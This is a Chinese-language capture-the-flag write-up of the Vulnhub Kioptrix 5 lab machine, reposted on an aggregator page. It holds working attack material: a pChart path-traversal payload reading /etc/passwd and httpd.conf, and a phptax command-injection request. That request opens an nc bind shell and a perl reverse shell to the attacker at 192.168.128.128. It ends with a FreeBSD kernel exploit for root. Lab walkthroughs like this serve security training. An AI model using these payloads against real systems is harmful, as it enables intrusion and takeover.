Vulnhub---kioptirx5 超详细wp

news2025/2/24 8:52:47

个人博客 WuTongSec

欢迎大佬指点

打点

nmap  192.168.128.0/24 -sP  找ip
nmap  192.168.128.137 --min-rate 10000 -p-  简单全端口扫描
nmap  192.168.128.137 -sC -sV -O -sT    详细 脚本 版本 系统 扫描
dirsearch -u http://192.168.128.137     目录扫描

image-20241207111826418

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
​

image-20241207112150438

源代码中有 cms框架

image-20241207112323566

拼接一下接口

image-20241207113312607

8080端口没有权限

image-20241207112312253

利用

先搜索一下pChart2.1.3 exp exp版本对的上 把exp复制到当前目录

searchsploit pChart

searchsploit pChart -m 31173

image-20241207112813683

查看exp信息 有xss和路径穿越遍历

image-20241207113047918

payload
hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
http://192.168.128.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

image-20241207113406388

在只能读取的情况下 尝试读取apache的默认配置文件
搜索一下FreeBSD系统下的apache的默认配置文件
​
https://cwiki.apache.org/confluence/display/HTTPD/DistrosDefaultLayout
https://cwiki.apache.org/ 是 Apache Software Foundation (ASF) 的一个 Confluence【汇流】 维基站点,它为 ASF 旗下的各个项目提供了一个协作和文档管理的平台
/usr/local/etc/apache22/httpd.conf
结合文件读取
http://192.168.128.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf

image-20241207143605027

ServerRoot 和 DocumentRoot:
ServerRoot 指定了 Apache 服务器的根目录。
DocumentRoot 指定了 Web 内容的根目录。了解这个路径有助于查找网站文件,有时可能包含敏感信息或未公开的资源。
<Directory> 和 <Files> 指令:
这些指令定义了对特定目录和文件的访问控制。检查这些部分可以揭示是否存在宽松的安全设置,例如允许目录浏览(Options Indexes),这可能会暴露文件结构给攻击者。
Include 指令:
Include 可以加载额外的配置文件或目录中的所有 .conf 文件。确认哪些文件被包含进来,因为它们可能含有其他重要的配置或者敏感信息。
LoadModule 指令:
列出了已加载的模块。某些模块如 mod_php, mod_perl, 或 mod_python 可能会提供额外的功能,但也可能引入安全风险。特别是如果你看到不常见的模块,应该进一步调查其功能和潜在影响。
ScriptAlias 和 Alias 指令:
ScriptAlias 通常用于指定 CGI 脚本的执行路径。Alias 用来映射 URL 到文件系统中的某个位置。注意这些路径,因为它们可能是执行任意代码或访问特殊资源的入口点。
ErrorLog 和 CustomLog 指令:
分别指定了错误日志和访问日志的位置。日志文件可能包含有关服务器行为的重要信息,包括可能的错误、警告以及用户活动记录。特别要留意是否有关于 SQL 注入、命令注入等攻击尝试的日志条目。

image-20241207164159197

意思是我们需要这个User-Agent头
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
​
GET /phptax/ HTTP/1.1
Host: 192.168.128.137:8080
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent:Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.128.137:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
把数据包换一下

image-20241207164658673

每次都要换Mozilla/4.0 Mozilla4_browser

有一个 phptax 查一下有没有exp

image-20241207164950693

image-20241207175238022

25849 这个exp 需要一个php_curl apt install里面没有那就换一个

image-20241207175421857

这个exp是 一个命令执行的 可以反弹shell回来

image-20241207175806965

靶机做好镜像 我自己很多时候发包没有回复 多恢复镜像可以了

image-20241207185814281

http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
http://192.168.128.137:8080/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
数据包
GET /phptax/drawimage.php?pfilez=xxx;%20id>/tmp/111;&pdf=make HTTP/1.1
Host: 192.168.128.137:8080
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.128.137:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

我们写一个命令 whoami>/tmp/qwer 使用之前的读取文件payload可以看到是成功的

image-20241207190105854

反弹shell

nc -lvnp 4444

试了很多的反弹shell 还是只有perl 可以

GET /phptax/drawimage.php?pfilez=xxx;%20perl%20-e%20'use%20Socket%3b%24i%3d%22192.168.128.128%22%3b%24p%3d4444%3bsocket(S%2cPF_INET%2cSOCK_STREAM%2cgetprotobyname(%22tcp%22))%3bif(connect(S%2csockaddr_in(%24p%2cinet_aton(%24i))))%7bopen(STDIN%2c%22%3e%26S%22)%3bopen(STDOUT%2c%22%3e%26S%22)%3bopen(STDERR%2c%22%3e%26S%22)%3bexec(%22%2fbin%2fsh%20-i%22)%3b%7d%3b';&pdf=make HTTP/1.1
Host: 192.168.128.137:8080
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 Mozilla4_browser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.128.137:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
​
​
反弹shell命令
GET /phptax/drawimage.php?pfilez=xxx; perl -e 'use Socket;$i="192.168.128.128";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");

image-20241207193124142

推荐一个插件 hack tools 很多实用的命令 反弹shell 命令行

image-20241207193150559

提权

刚开始尝试了 suid提权 发现没有
​
计划任务 也不行
​
sudo 也不行
​
那就只有内核提权了 去找exp
​
$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

上传:nc -lvnp 233 < 28718.c

下载:nc 192.168.128.128 233 > 28718.c

image-20241207204702434

编译文件 生成的是默认 a.out

成功

image-20241207205239503

image-20241207205254183

总结

反弹shell有的多种

上传:nc -lvnp 233 < 28718.c

下载:nc 192.168.128.128 233 > 28718.c

这个地方是查各种系统 apache的默认文件信息的

DistrosDefaultLayout - HTTPD - Apache Software Foundation

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2255523.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

JAVA八股文-运行篇-创建项目运行(1)

JAVA八股文-运行篇-创建项目运行(1)

前置环境搭建:jdk、maven、idea、linux环境 一、创建一个java项目 File->New->Project 二、填写基本信息 三、完成&#xff0c;写了一段代码 四、打包 五、本地运行&#xff0c;运行和debug二选一 六、上传至linux环境 七、linux环境下命令执行 7.1 指定Main方法类 …
阅读更多...
【C++】异常之道,行者无疆:解锁 C++ 的异常捕获哲学

【C++】异常之道,行者无疆:解锁 C++ 的异常捕获哲学

文章目录 C语言处理错误C异常异常的抛出与捕获基本语法catch 的匹配原则函数调用链中的匹配原则异常的重新抛出 异常安全异常规范C标准库异常 C语言处理错误 终止程序&#xff1a;利用 assert() 断言去终止程序&#xff0c;当 ()的表达结果为 false 时会终止程序。返回错误码&…
阅读更多...
[SWPUCTF 2022 新生赛]Ez_upload 详细题解

[SWPUCTF 2022 新生赛]Ez_upload 详细题解

知识点: 文件上传 MIME绕过 script版本一句话木马 .htaccess配置文件 蚁剑虚拟终端的使用 打开题目可以文件上传 传入php文件, 提示 后缀不能是ph 所以也不能输入 phtml php3 pht等可以解析为php文件的后缀 bp抓包把传入的php木马文件后缀手动修改为jpg图片格式 提示 你上…
阅读更多...
V20变频器设置电机电流超过设定的值,变频器报警停止运转

V20变频器设置电机电流超过设定的值,变频器报警停止运转

之前使用的台达变频器是有相关参数的设置的&#xff0c;比如设置额定电流的限制比例未1.5A时&#xff0c;超过1.5A时&#xff0c;变频器会输出报警信号&#xff0c;并停机报警。换到V20变频时&#xff0c;翻遍了说明书&#xff0c;并各种参数测试组合&#xff0c;未找到明确的相…
阅读更多...
网络安全-态势感知

网络安全-态势感知

0x00 定义&#xff1a; 态势感知&#xff08;Situation Awareness&#xff0c;SA&#xff09;能够检测出超过20大类的云上安全风险&#xff0c;包括DDoS攻击、暴力破解、Web攻击、后门木马、僵尸主机、异常行为、漏洞攻击、命令与控制等。利用大数据分析技术&#xff0c;态势感…
阅读更多...
未完成_RFdiffusion应用案例_从头设计pMHC的结合剂

未完成_RFdiffusion应用案例_从头设计pMHC的结合剂

目录 1. 论文导读1&#xff09;摘要2&#xff09;设计流程3&#xff09;设计流程的验证 2. 实战 1. 论文导读 Liu, Bingxu, et al. “Design of high specificity binders for peptide-MHC-I complexes.” bioRxiv (2024): 2024-11. 1&#xff09;摘要 MHC-I 将胞内抗原肽递呈…
阅读更多...
Vant UI Axure移动端元件库:提升移动端原型设计效率

Vant UI Axure移动端元件库:提升移动端原型设计效率

UI框架的选择对于提升开发效率和用户体验至关重要。Vant UI&#xff0c;作为一款基于Vue.js的轻量、可靠的移动端组件库&#xff0c;自2017年开源以来&#xff0c;凭借其丰富的组件库、良好的性能以及广泛的兼容性&#xff0c;在移动端开发领域崭露头角&#xff0c;赢得了众多开…
阅读更多...
英文输入法---华为OD机试2024年E卷

英文输入法---华为OD机试2024年E卷

题解&#xff1a; 代码&#xff1a;
阅读更多...
stm32中的常用函数

stm32中的常用函数

目录 一、定义声明类 1.1 预定义 1.2 条件编译 1.3 extern 声明 1.3 typedef 类型别名 1.4 结构体 二、基础函数 2.1 delay类函数 2.2 printf函数 三、GPIO 3.1 硬件 3.2 通用外设驱动模型 3.3 例程 四、中断 4.1. 什么是中断 4.2. NVIC 4.3. EXTI 4.4. EXTI和…
阅读更多...
静态路由与交换机配置实验

静态路由与交换机配置实验

1.建立网络拓扑 添加2台计算机&#xff0c;标签名为PC0、PC1&#xff1b;添加2台二层交换机2960&#xff0c;标签名为S0、S1&#xff1b;添加2台路由器2811&#xff0c;标签名为R0、R1&#xff1b;交换机划分的VLAN及端口根据如下拓扑图&#xff0c;使用直通线、DCE串口线连接…
阅读更多...
【Appium】AttributeError: ‘NoneType‘ object has no attribute ‘to_capabilities‘

【Appium】AttributeError: ‘NoneType‘ object has no attribute ‘to_capabilities‘

目录 1、报错内容 2、解决方案 &#xff08;1&#xff09;检查 &#xff08;2&#xff09;报错原因 &#xff08;3&#xff09;解决步骤 3、解决结果 1、报错内容 在PyCharm编写好脚本后&#xff0c;模拟器和appium也是连接成功的&#xff0c;但是运行脚本时报错&…
阅读更多...
【汇编语言】标志寄存器(三) —— 条件跳转,精准决策:汇编语言的比较与转移

【汇编语言】标志寄存器(三) —— 条件跳转,精准决策:汇编语言的比较与转移

文章目录 前言1. 检测比较结果的条件转移指令1.1 什么是条件转移指令&#xff1f;1.2 两类条件转移指令 2. 根据无符号比较的条件转移指令2.1 如何记忆&#xff1f;2.2 如何实现比较转移的功能&#xff1f;2.3 举例说明2.3.1 例12.3.2 例2 3. 总结4. 例题巩固4.1 问题一4.1.1 问…
阅读更多...
【Unity高级】如何获取着色器(Shader)的关键词

【Unity高级】如何获取着色器(Shader)的关键词

在动态设置Shader时&#xff0c;会需要通过EnableKeyword, DisableKeyword来完成。但一个Shader有哪些关键词呢&#xff1f;Unity的文档中并没有列出来&#xff0c;但我们可以通过遍历Shader的KeywordSpace来查看。 1. 代码如下 using UnityEngine;public class KeywordExamp…
阅读更多...
针对边缘计算优化LoRa的TinyML信道跳变管道

针对边缘计算优化LoRa的TinyML信道跳变管道

论文标题&#xff1a;Optimizing LoRa for Edge Computing with TinyML Pipeline for Channel Hopping&#xff08;针对边缘计算优化LoRa的TinyML信道跳变管道&#xff09; 作者信息&#xff1a;Marla Grunewald, Mounir Bensalem 和 Admela Jukan&#xff0c;来自德国布伦瑞克…
阅读更多...
使用AI工具Screenshot to Code将UI设计图翻译成代码

使用AI工具Screenshot to Code将UI设计图翻译成代码

一、获取openAI apikey。 一般有两种方式&#xff0c;一种是到openAI官网注册账号&#xff0c;付费申请GPT4的apikey。另一种是某宝买代理。我这里采用第二种。 二、安装Screenshot to Code 1.到github下载源码。 2.启动&#xff0c;两种方式&#xff1a;源码启动和docker启动…
阅读更多...
python学opencv|读取图像(三)放大和缩小图像

python学opencv|读取图像(三)放大和缩小图像

【1】引言 前序已经学习了常规的图像读取操作和图像保存技巧&#xff0c;相关文章链接为&#xff1a; python学opencv|读取图像-CSDN博客 python学opencv|读取图像&#xff08;二&#xff09;保存彩色图像-CSDN博客 今天我们更近一步&#xff0c;学习放大和缩小图像的技巧&…
阅读更多...
【vue2自定义指令】v-disabled 实现el-switch,el-button等elementUI禁用(disabled)效果

【vue2自定义指令】v-disabled 实现el-switch,el-button等elementUI禁用(disabled)效果

如果你搜过类似的功能&#xff0c;肯定看到过千篇一律的 // 实现按钮禁用el.disabled true// 增加 elementUI 的禁用样式类el.classList.add(is-disabled)但是这个方案明显对el-switch&#xff0c;不起作用&#xff0c;所以我这边直接把方案贴出来&#xff0c;不想了解具体原理…
阅读更多...
烟草行业通过Profinet转EthernetIP网关打通数据壁垒

烟草行业通过Profinet转EthernetIP网关打通数据壁垒

在工业自动化领域&#xff0c;Profinet转Ethernet/IP是两种广泛应用的工业以太网协议。它们各自具有独特的特点和优势&#xff0c;而在实际应用中&#xff0c;经常需要实现这两种协议之间的互通&#xff0c;这时就需要使用到开疆智能Profinet转Ethernet/IP网关KJ-EIP-108。同时…
阅读更多...
C++内存布局以及常用关键字

C++内存布局以及常用关键字

C内存布局以及常用关键字 C的内存空间 代码存储区域&#xff1a;常量区、代码区、静态区&#xff08;全局区&#xff09;、堆区、栈区 栈区向下增长&#xff0c;堆区向上增长。栈由系统管理&#xff0c;没有内存碎片&#xff0c;每个元素之间都是连续的&#xff0c;大小比较…
阅读更多...
插入排序⁻⁻⁻⁻直接插入排序希尔排序

插入排序⁻⁻⁻⁻直接插入排序希尔排序

引言 所谓的排序&#xff0c;就是使一串记录按照其中的某个或某些关键字的大小&#xff0c;递增或递减的排列起来的操作。 常见的排序算法有&#xff1a; 今天我们主要学习插入排序的直接插入排序和希尔排序。 直接插入排序 什么是直接插入排序&#xff1f; 直接插入排序其…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023